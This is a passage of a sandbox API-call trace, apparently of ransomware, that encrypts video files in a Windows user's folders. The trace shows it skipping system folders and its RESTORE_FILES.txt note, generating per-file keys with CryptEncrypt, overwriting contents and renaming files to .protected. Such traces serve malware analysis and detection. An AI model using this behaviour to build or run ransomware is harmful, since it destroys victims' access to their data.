lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.038] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.038] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.038] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.038] CloseHandle (hObject=0x14c) returned 1 [0093.038] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4.protected") returned 93 [0093.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\eodqj_9itm0idt-2f.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\eodqj_9itm0idt-2f.mp4.protected")) returned 1 [0093.039] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="Windows") returned -1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="Program Files") returned -1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="Program Files (x86)") returned -1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="$Recycle.bin") returned 1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", 
lpString2="System Volume Information") returned -1 [0093.039] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4") returned 79 [0093.039] StrStrIW (lpFirst="htO1HkZfrSYC4.mp4", lpSrch=".protected") returned 0x0 [0093.039] lstrcmpW (lpString1="htO1HkZfrSYC4.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0093.039] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.039] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\hto1hkzfrsyc4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4") returned 79 [0093.040] StrStrW (lpFirst="htO1HkZfrSYC4.mp4", lpSrch=".txt") returned 0x0 [0093.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4") returned 79 [0093.040] StrStrW (lpFirst="htO1HkZfrSYC4.mp4", lpSrch=".rar") returned 0x0 [0093.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4") returned 79 [0093.040] StrStrW (lpFirst="htO1HkZfrSYC4.mp4", lpSrch=".zip") returned 0x0 [0093.040] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x17e9, lpOverlapped=0x0) returned 1 
[0093.041] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe817, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.041] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x17e9, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x17e9, lpOverlapped=0x0) returned 1 [0093.041] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.041] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.041] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.041] CloseHandle (hObject=0x14c) returned 1 [0093.041] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4.protected") returned 89 [0093.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\hto1hkzfrsyc4.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\hto1hkzfrsyc4.mp4.protected")) returned 1 [0093.042] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="Windows") returned -1 [0093.042] lstrcmpiW 
(lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="Program Files") returned -1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="Program Files (x86)") returned -1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="$Recycle.bin") returned 1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="System Volume Information") returned -1 [0093.042] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4") returned 80 [0093.042] StrStrIW (lpFirst="i4K5ZpOUBo_pU4.mp4", lpSrch=".protected") returned 0x0 [0093.042] lstrcmpW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0093.042] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.042] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\i4k5zpoubo_pu4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4") returned 80 [0093.043] StrStrW (lpFirst="i4K5ZpOUBo_pU4.mp4", lpSrch=".txt") returned 0x0 [0093.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4") returned 80 [0093.043] StrStrW (lpFirst="i4K5ZpOUBo_pU4.mp4", lpSrch=".rar") returned 0x0 [0093.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4") returned 80 [0093.043] StrStrW (lpFirst="i4K5ZpOUBo_pU4.mp4", lpSrch=".zip") returned 0x0 [0093.043] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.044] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.044] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.044] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.044] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.044] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.044] CloseHandle (hObject=0x14c) returned 1 [0093.044] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4.protected") returned 90 [0093.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\i4k5zpoubo_pu4.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\i4k5zpoubo_pu4.mp4.protected")) returned 1 [0093.045] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="Windows") returned -1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="Program Files") returned -1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="Program Files (x86)") returned -1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="$Recycle.bin") returned 1 [0093.045] lstrcmpiW (lpString1="jkIkQo-HvvnL.swf", lpString2="System Volume Information") returned -1 [0093.045] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf") returned 78 [0093.045] StrStrIW (lpFirst="jkIkQo-HvvnL.swf", lpSrch=".protected") returned 0x0 [0093.045] lstrcmpW (lpString1="jkIkQo-HvvnL.swf", lpString2="RESTORE_FILES.txt") returned -1 [0093.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\jkikqo-hvvnl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf") returned 78 [0093.046] 
StrStrW (lpFirst="jkIkQo-HvvnL.swf", lpSrch=".txt") returned 0x0 [0093.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf") returned 78 [0093.046] StrStrW (lpFirst="jkIkQo-HvvnL.swf", lpSrch=".rar") returned 0x0 [0093.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf") returned 78 [0093.046] StrStrW (lpFirst="jkIkQo-HvvnL.swf", lpSrch=".zip") returned 0x0 [0093.046] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.047] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.047] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.047] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.047] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.047] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.047] CloseHandle (hObject=0x14c) returned 1 [0093.048] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf.protected") returned 88 [0093.048] 
MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\jkikqo-hvvnl.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\jkIkQo-HvvnL.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\jkikqo-hvvnl.swf.protected")) returned 1 [0093.048] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="Windows") returned -1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="Program Files") returned 1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="Program Files (x86)") returned 1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="$Recycle.bin") returned 1 [0093.048] lstrcmpiW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="System Volume Information") returned 1 [0093.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf") returned 82 [0093.049] lstrcmpW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2=".") returned 1 [0093.049] lstrcmpW (lpString1="VfPpB1ZPFMpD1GKT2Shf", lpString2="..") returned 1 [0093.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\*") returned 84 [0093.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.049] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.049] 
lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.049] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\.") returned 84 [0093.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.049] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.049] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\..") returned 85 [0093.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.049] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="Windows") returned -1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="Program Files") returned 1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="Program Files (x86)") returned 1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="$Recycle.bin") returned 1 [0093.049] lstrcmpiW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="System Volume Information") returned 1 [0093.049] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi") returned 107 [0093.049] StrStrIW (lpFirst="SzYMWEbUmmm3aJC7N_h0.avi", lpSrch=".protected") returned 0x0 [0093.049] lstrcmpW (lpString1="SzYMWEbUmmm3aJC7N_h0.avi", lpString2="RESTORE_FILES.txt") returned 1 [0093.049] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.050] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\szymwebummm3ajc7n_h0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi") returned 107 [0093.050] StrStrW (lpFirst="SzYMWEbUmmm3aJC7N_h0.avi", lpSrch=".txt") returned 0x0 [0093.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi") returned 107 [0093.050] StrStrW (lpFirst="SzYMWEbUmmm3aJC7N_h0.avi", lpSrch=".rar") returned 0x0 [0093.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi") returned 107 [0093.050] StrStrW (lpFirst="SzYMWEbUmmm3aJC7N_h0.avi", lpSrch=".zip") returned 0x0 [0093.051] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.051] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.051] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.052] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.052] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.052] CloseHandle (hObject=0x150) returned 1 [0093.052] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi.protected") returned 117 [0093.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\szymwebummm3ajc7n_h0.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\SzYMWEbUmmm3aJC7N_h0.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\szymwebummm3ajc7n_h0.avi.protected")) returned 1 [0093.053] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="Windows") returned -1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="Program Files") returned 1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="Program Files (x86)") returned 1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="$Recycle.bin") returned 1 [0093.053] lstrcmpiW (lpString1="s_i2.avi", lpString2="System Volume Information") returned -1 [0093.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, 